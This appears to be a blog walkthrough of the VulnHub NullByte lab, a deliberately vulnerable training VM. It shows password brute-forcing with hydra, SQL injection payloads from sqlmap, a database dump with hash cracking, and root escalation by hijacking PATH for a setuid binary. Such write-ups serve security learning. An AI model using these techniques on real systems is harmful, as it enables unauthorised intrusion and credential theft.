18 January 2022

Pentesting Fun Stuff

following the cyber security path…

NullByte

Location

https://download.vulnhub.com/nullbyte/NullByte.ova.zip

Description

Objective: Get to /root/proof.txt and follow the instructions.
Level: Basic to intermediate.
Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware.
Hints: Use your lateral thinking skills, maybe you’ll need to write some code.

Enumeration

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.110.4
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-08 11:49 CEST
Nmap scan report for 192.168.110.4
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43405/udp status
|_ 100024 1 53410/tcp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
53410/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.17 seconds

Let’s start with port 80.

┌─[n13mant@planetmars]─[~]
└──╼ $curl -v http://192.168.110.4/
* Trying 192.168.110.4...
* Connected to 192.168.110.4 (192.168.110.4) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.110.4
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 08 Sep 2016 11:52:05 GMT
< Server: Apache/2.4.10 (Debian)
< Last-Modified: Sat, 01 Aug 2015 16:44:18 GMT
< ETag: "c4-51c42a5c32a70"
< Accept-Ranges: bytes
< Content-Length: 196
< Vary: Accept-Encoding
< Content-Type: text/html
<
<html>
<head><title>Null Byte 00 - level 1</title></head>
<body>
<center>
<img src="main.gif">
<p> If you search for the laws of harmony, you will find knowledge. </p>
</center>
</body>
</html>
* Connection #0 to host 192.168.110.4 left intact
┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.110.4/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Sep 8 11:53:59 2016
URL_BASE: http://192.168.110.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.4/ ----
+ http://192.168.110.4/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.110.4/javascript/
==> DIRECTORY: http://192.168.110.4/phpmyadmin/
+ http://192.168.110.4/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.110.4/uploads/
-----SNIP-----

Next I downloaded the main.gif file and examine it with exiftool. There was a password-like piece inside as comment: “P-): kzMb5nVYJw”. Was it a password for the phpMyAdmin site or something else? A simple try was to append it to the URL and the result was satisfying.
page1

┌─[n13mant@planetmars]─[~]
└──╼ $curl http://192.168.110.4/kzMb5nVYJw/
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>

The password is not that complex, but after a few tries I decided to let hydra do this tiresome job.

┌─[n13mant@planetmars]─[~]
└──╼ $hydra -f 192.168.110.4 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l "" -P /usr/share/wordlists/english_words/words.dic
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
-----SNIP-----
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 192.168.110.4 password: elite
1 of 1 target successfully completed, 1 valid password found
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/index.php
<p>Search for usernames: </p>
<hr>
<form action="420search.php" method="get">
Enter username:<br>
<input type="text" name="usrtosearch">
</form>
┌─[n13mant@planetmars]─[~]
└──╼ $curl -X POST -F 'key=elite' http://192.168.110.4/kzMb5nVYJw/420search.php
EMP ID :1 <br> EMP NAME : ramses <br> EMP POSITION : <br> --------------------------------<br>EMP ID :2 <br> EMP NAME : isis <br> EMP POSITION : employee <br> --------------------------------<br>Fetched data successfully

A database. First some manual tries, but after a while I decided to put my faith in sqlmap.

┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbs
 _
 ___ ___| |_____ ___ ___ {1.0.8.2#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
 |_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:20:24
-----SNIP-----
Parameter: #1* (URI)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND 8757=8757#
Type: error-based
 Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162787671,(SELECT (ELT(6320=6320,1))),0x717a767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- PfDF
Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" AND SLEEP(5)-- IEfZ
Type: UNION query
 Title: MySQL UNION query (NULL) - 3 columns
 Payload: http://192.168.110.4:80/kzMb5nVYJw/420search.php?usrtosearch=isis" UNION ALL SELECT CONCAT(0x7162787671,0x4772734e5241706d774a6f734c53427a57414870547246534a69794b454d447665754461756c7778,0x717a767a71),NULL,NULL#
---
[13:20:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[13:20:51] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth --tables
-----SNIP-----
[13:24:00] [INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+
┌─[n13mant@planetmars]─[~]
└──╼ $sqlmap -u "http://192.168.110.4/kzMb5nVYJw/420search.php?usrtosearch=isis*" --dbms=mysql -D seth -T users --dump
-----SNIP-----
[13:24:14] [INFO] fetching columns for table 'users' in database 'seth'
[13:24:14] [INFO] fetching entries for table 'users' in database 'seth'
[13:24:14] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+

I guess the isis user will be the goal to elevate to when inside the machine. The string from ramses looks like base64 to me.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=' | base64 -d
c6d6bd7ebf806f43c76acc3681703b81

And that looks like a md5 hash.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $findmyhash MD5 -h c6d6bd7ebf806f43c76acc3681703b81
-----SNIP-----
The following hashes were cracked:
----------------------------------
c6d6bd7ebf806f43c76acc3681703b81 -> omega

Let’s see if this will grant some access to the server.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh ramses@192.168.110.4 -p 777
ramses@192.168.110.4's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:/home$ ls -lah
total 20K
drwxr-xr-x 5 root root 4.0K Aug 2 2015 .
drwxr-xr-x 21 root root 4.0K Aug 1 2015 ..
drwxr-xr-x 2 bob bob 4.0K Aug 2 2015 bob
drwxr-xr-x 2 eric eric 4.0K Aug 2 2015 eric
drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 ramses

bob and eric? Not the kind of names I would have expected.

ramses@NullByte:/home$ ls -aRl bob
bob:
total 20
drwxr-xr-x 2 bob bob 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw-r--r-- 1 bob bob 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 bob bob 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 bob bob 675 Aug 2 2015 .profile
ramses@NullByte:/home$ ls -aRl eric
eric:
total 24
drwxr-xr-x 2 eric eric 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw------- 1 eric eric 545 Aug 2 2015 .bash_history
-rw-r--r-- 1 eric eric 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 eric eric 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 eric eric 675 Aug 2 2015 .profile
ramses@NullByte:/home$ ls -aRl ramses
ramses:
total 24
drwxr-xr-x 2 ramses ramses 4096 Aug 2 2015 .
drwxr-xr-x 5 root root 4096 Aug 2 2015 ..
-rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history
-rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3515 Aug 2 2015 .bashrc
-rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile
ramses@NullByte:/home$ cat /home/ramses/.bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit

A backup folder in /var/www.

ramses@NullByte:/home$ cd /var/www/
ramses@NullByte:/var/www$ ls -lah
total 16K
drwxr-xr-x 4 root root 4.0K Aug 2 2015 .
drwxr-xr-x 12 root root 4.0K Aug 2 2015 ..
drwxrwxrwx 2 root root 4.0K Aug 2 2015 backup
drwxr-xr-x 4 root root 4.0K Aug 2 2015 html
ramses@NullByte:/var/www$ cd backup
ramses@NullByte:/var/www/backup$ ls -lh
total 12K
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ ls -lah
total 20K
drwxrwxrwx 2 root root 4.0K Aug 2 2015 .
drwxr-xr-x 4 root root 4.0K Aug 2 2015 ..
-rwsr-xr-x 1 root root 4.9K Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...

What mess?

ramses@NullByte:/var/www/backup$ ./procwatch
 PID TTY TIME CMD
 1679 pts/0 00:00:00 procwatch
 1680 pts/0 00:00:00 sh
 1681 pts/0 00:00:00 ps

Looks like it runs ps as root, but without an absolute path.

ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH=`pwd`:${PATH}

I made a symbolic link to /bin/sh and called it ps. Then I set PATH to my current location.
Now it’s time to run procwatch again.

ramses@NullByte:/var/www/backup$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls
proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

Conclusion

This was a cool challenge. I had fun and learned new stuff.
Thanks to ly0n for making this one available.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.